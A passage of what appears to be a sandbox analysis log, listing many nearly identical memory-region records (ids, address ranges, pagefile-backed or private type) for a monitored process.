monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3853 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3854 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3855 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3856 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3857 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3858 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3859 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3860 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3861 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3862 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3863 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3864 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3865 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3866 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3867 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3868 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3870 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3871 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3872 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3873 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3874 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3875 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3876 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3877 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3878 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3879 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3880 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3881 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3882 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3883 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3884 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3885 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3886 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3889 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3890 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3891 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3892 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3893 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3894 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3895 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3896 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3897 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3898 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3899 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3900 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3901 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3902 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3903 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3904 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3905 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3906 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3907 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3910 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3911 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3912 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3913 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3914 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3915 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3916 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3917 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3918 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3919 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3920 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3921 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3922 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3923 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3924 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3925 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3929 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3931 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3932 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3933 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3934 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3935 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3936 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3937 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3938 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3939 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3940 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3941 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3942 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3943 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3944 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3945 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3946 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3947 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3948 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3949 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3950 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3951 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3952 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3953 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3954 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3955 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3956 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3957 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3958 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3959 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3960 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3961 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3962 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3963 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3964 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3965 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3966 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3967 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3968 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3969 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3970 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3971 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3972 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3973 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3974 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3975 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3976 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3977 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3978 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3979 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3980 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3981 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3982 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3983 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3984 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3985 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3986 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3987 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3988 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3989 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3990 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3991 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3992 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3993 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3994 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3995 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3996 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3997 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3998 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3999 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4000 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4001 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4002 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4003 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4004 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4005 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4006 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4007 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4008 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4009 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4010 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4011 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4012 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4013 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4014 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4015 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4016 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4017 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4018 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4019 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4020 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4021 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4022 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4023 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4024 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4025 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4026 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4027 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4028 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4029 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4030 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4031 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4032 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4033 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4034 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4035 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4036 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4037 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4038 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4039 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4040 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4041 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4042 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4043 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4044 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4045 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4046 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4047 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 4048 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 4049 start_va = 0x540000 end_va = 